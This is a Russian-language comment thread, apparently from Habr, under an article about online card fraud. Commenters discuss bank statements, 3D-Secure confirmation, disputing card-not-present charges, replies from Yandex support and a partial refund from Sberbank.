      В выписке Сбербанка номеров карт получателей нет. Когда отправляешь через их личный кабинет, то они присылают подробные смс со всей информацией, включая реквизиты получателя. А когда через посредников шлешь, то информации в смс минимальное количество. В подтверждающих смс может быть даже больше информации, чем доступно на сайте. В сбербанке в личном кабинете есть просто выписка с минимальным количеством информации. В этой выписке есть короткое обозначение расходной или приходной операции. А есть еще полная банковская выписка, в которой нет даже названий контрагентов и назначений платежа. Есть только номера счетов (по большей части внутренние номера счетов сбербанка).
      • 0
        А банк получателя средств ставили в известность? В выписке наверное и частично реквизиты карты получателя указаны.
        27.09.16 я дополнительно написал в Яндекс с указанием пяти обнаруженных номеров банковских карт, на которые выводились украденные средства. Сослался на предыдущую переписку и эту статью.
        Вот ответ Яндекса:
        Спасибо за Ваше письмо. Необходимые меры по данным картам были приняты.
        Мы также будем благодарны Вам за информацию о любых подобных письмах и случаях мошенничества.
        Спасибо за запрос.
  • 0
    EU домен требует чтобы владелец домена был резидентом Евросоюза и некоторые регистраторы требуют предоставить скан документов. Так что есть шанс найти владельца домена через интерпол.
  • 0
    1 данные раельной карты ввожу только в форму на сайте банка, предварительно глянув в ssl сертификат. Либо на сайте известной платежной системы, тоже рповерив сертификат.
    2 Если очень надо ввести данные карты непонятно в какую форму, то открваю виртуальную карту на нужную сумму — хотябы больше не спишут.
    3 Ну и выберу лучше сайт авиакомпании или проверенного перепродавца, пусть на 10-20% дороже чем непонятный сервис.
  • +1
    Да уж… неслабое расследование…

    У меня онлайн платежи по кредитной карте всегда требуют авторизации моего банка. Выглядит жто примерно так: после заполнения всез данных и нажатия кнопки «оплатить» или ее аналога, меня перебрасывает на страницу интернет банка, где я и должен пройти авторизацию (с использованием одноразового кода и кода подтверждения) — геморно конечно, но довольно надежно (хотя конечно не на 100%)
    • +2
      Сбербанк тоже всегда перекидывает на страницу, требующую подтверждения кодом СМС при оплате через интернет. Но как оказалось, что это подтверждение требуется не всегда.

      Ваш банк, по Вашим словам, всегда требует сразу два кода. Но Вы точно это знаете? Может быть в аналогичной ситуации банк не запросил бы ни одного кода. Пока не попробуете, не узнаете.

      Два кода тоже могут не помочь, если Вас обманут. Вас также перекинут на страницу оплаты, где Вы введете столько кодов, сколько нужно, если не заметите подвох.
      • 0
        Да я ТОЧНО знаю, что мой банк действует так как я описал… И второй тоже — я клиент двух банков (схемы авторизации в них немного отличаются, но смысл один). Есть только один вариант, когда коды не запращиваются — если я регистрирую свою карту в каком-то сервисе, нде оплата периодическая — в жтом случае я авторизую всю схему в самый первый раз (т… е. когда регистрирую карту на сервисе) — примеры таких сервисов — Microsoft (Office, Skype), DropBox, AWS… кажется в моем случае это все…

        А точно я это знаю потому, что я самолично выставлял соответствующие галочки. Схема с кодами кстати не единственный вариант — можно выбрать и другие — с использованием мобильного придожения например… можно даже с паролем (но там все равно двухфакторная аутентификация)… кажется с СМС еще можно… С кодами доступа оно как-то привычнее — оно по умолчанию… Система достаточно надежная — у нас банки удостоверяют личность (по той-же схеме) для всяких онлайновых сервисов, включая и государственные услуги. А уж онлайновые платежи — я больше за дебетовые карты беспокюсь, чем за кредитную… Там если что гекмор практически обеспечен, хотя деньги скорее всего вернут (был прецедент уже)
    • 0
      Это называется 3d-secure и внимание, инициируется магазином, т.е. принимающим деньги.
      И самое главное, повторно магазин может не запрашивать эти данные у вашего банка. Пример ozon (и куча других) если вы сохраняете карту в интерфейсе (бывает она сохраняется автоматически, как у ozon но ее можно удалить, правда только при новом заказе, это решение мне сказали в саппорте), первая оплата проходит с sms-подтверждением, все остальные — нет.

      Мое имхо, это не защита а видимость, банк сам должен мне прислать sms о запросе средств (кто, сколько и другие подробности) и пока я не пришлю подтверждения… но это неосуществимые мечты, как я понимаю, идеологически, в алгоритме снятия с карты (в тех же ATM на кассах) нет паузы, в течении которой можно реализовать такое подтверждение.
      • 0
        У украинского привата, например, помимо 3d-secure еще и своя проверка на все непериодические платежи. Выглядит это так — при любой оплате меня перекидывает на страницу привата где я должен подтвердить оплату. Причем от настроек мерчанта не зависит совершенно(проверял, имеется биллинг для которого настраивал оплату через различные системы, в том числе и напрямую через банк. На время тестов 3d-secure был отключен, но проверка привата все равно была.)
        • 0
          А тут как раз периодический платёж — сначала заплатил 5900 а на следующий день ещё пачка на ту же сумму с периодом несколько минут.
      • 0
        Я дам очень краткий ответ — мой банк не перечислит ни копейки, пока я не авторизую платеж описанным способом — вде зависимости от того, что там магазин сохраняет. Исключения я написал — я авторизую периодические платежи от конкретного поставщика услуг (и могу в любой момент это остановить)
    • 0
      На AliExpress тоже требует код ввести? Что за банк такой?
      • 0
        и на AliExpress тоже — любая попытка провести платеж по кредитной карте, возвращает требование авторизации у банка-эмитента карты. Магазин может в принципе забить на это и не получить моих денег (например если он не подключился к такому платежному провайдеру, который поддерживает этот протокол), либо перенаправить меня на сайт авторизации моего банка и завершить платеж согласно протоколу. В принципе (именно так — В ПРИНЦИПЕ) я могу разрешить совершать платежи с моей картой без этого протокола, но я этого делать не стану (хотя было бы неплохо ограничить какой-то максимальной суммой в течение дня — скажем 20 евро. Но такой настройки нет… ну… не было года три назад, когда я там ковырялся)

  • 0
    Ну так деньги назад вернули или нет? Если нет, прошу отписаться потом по результатам — очень интересно насколько реально оспорить транзакцию.
    • +1
      Пока неизвестно. Сбербанк написал, что рассмотрение заявления производится в срок до 15 дней (видно на заглавном скриншоте с смс). Срок пока не прошел. Ждем. Результат отпишу.
      • 0
        «Написали, что срок рассмотрения продлили дополнительно на 30 дней. Деньги на данный момент не вернулись.»

        Ну жду тогда результата через 30 дней. Хотя и так его предвижу…
        • +1
          Ну жду тогда результата через 30 дней. Хотя и так его предвижу…
          Результат оказался неожиданным.

          Деньги, которые были списаны за Яндекс.Директ, вернулись 12.10.2016 (17700р+17700р). Возврат произошел через 22 дня с момента подачи заявления в банк.
          Деньги, которые ушли на чью-то карту ~5900р+5900р+комиссия на данный момент не вернулись.

          Дописал это в публикации. Там же есть скриншот с подтверждением.

          Готовится продолжение этой статьи. Скорее всего будет опубликовано на следующей неделе. Будет интересно.
          • +1
            xbox сделайте в этой статье апдейт со ссылкой на новую потом
            не хотелось бы пропустить
  • +3
    Все транзакции без 3Dsecure и карты — cnp-платежи, которые оспариваются в пол-пинка. Если банк козлит — писать в визу. Как в визу писать не знаю, в мастеркард:
    https://www.mastercard.ru/ru-ru/consumer/support/emergency-services.html
    • +1
      Это вроде консьерж-сервис, а всё общение с МПС у нас идёт через банк. Зато прямо в законе о НПС прописана обязанность банков возвращать деньги при сообщении в течении суток.
      • 0
        Если банк козлит, то тут можно на них пожаловаться.
  • НЛО прилетело и опубликовало эту надпись здесь
    • +2
      Тут конечно все зависит от того, кто это будет расследовать. Если обычные следователи, то их уровень знаний в компьютерной тематике, вероятно, недостаточный, чтобы кого-то найти. Если расследованием подобных дел занимаются высококвалифицированные специалисты, обладающие определенными полномочиями, то конечно все это можно распутать или по крайней мере сделать так, чтобы ситуация не повторялась. Если на помощь правоохранителям придут специалисты крупных банков, специалисты Яндекса, представители хостинг-провайдеров итп, то я думаю есть все шансы вычислить всех мошенников. Службы безопасности крупных банков иногда сами вскрывают мошеннические схемы. Другое дело, что нужно, чтобы все из списка выше, захотели заняться поиском мошенников.

      Вот ответ службы поддержки Яндекса на заявление о мошеннических операциях с использованием их сервисов. Ответ был получен пять дней назад. 21/09/2016

      Здравствуйте.

      По Вашему запросу мы провели расследование и приняли все необходимые меры. К сожалению, деньги уже потрачены, и вернуть их нам не удалось.

      При обращении в полицию не забудьте, пожалуйста, рекомендовать лицу, принимавшему у Вас заявление, обратиться для разрешения вопросов, связанных с Вашим заявлением, в подразделения, расследующие преступления в сфере высоких информационных технологий (в России — подразделения Специальных Технических Мероприятий).

      В заявлении необходимо максимально точно указать всю имеющуюся у Вас информацию: обстоятельства обмана, номера телефонов и так далее. Также обязательно приложите к заявлению копии квитанций на зачисление денежных средств. Оригиналы этих квитанций могут понадобиться нам, если нам удастся найти Ваши деньги.

      Всю имеющуюся у нас информацию, касающуюся данного инцидента, мы предоставим правоохранительным органам по их запросу.

      Спасибо за запрос

      Яндекс пишет, что деньги потрачены. Но, я надеюсь, что итоговое слово, вернут сумму или нет, за Сбербанком.
      И совет Яндекс правильный дает по поводу выбора подразделения. Какое подразделение полиции в конечном итоге будет вести расследование, я не знаю. Заявитель готов содействовать расследованию, но если всякая бумажная переписка и поездки по различным подразделениям затянется на месяцы, то неизвестно до какого момента он будет готов этим заниматься.
      • НЛО прилетело и опубликовало эту надпись здесь
        • 0
          Возможно, вы имели в виду: машалла

          (иншалла значит «если Аллах пожелает», и тут по смыслу не подходит.)
          • НЛО прилетело и опубликовало эту надпись здесь
            • +2
              Первоначальное скорей было правильно
              В арабских странах считается невежливым отказывать прямо, говоря «Нет». В таких случаях Иншаллах примерно может означать, «То, о чём вы меня просите, к сожалению, неосуществимо, если только не вмешается Бог» (ц)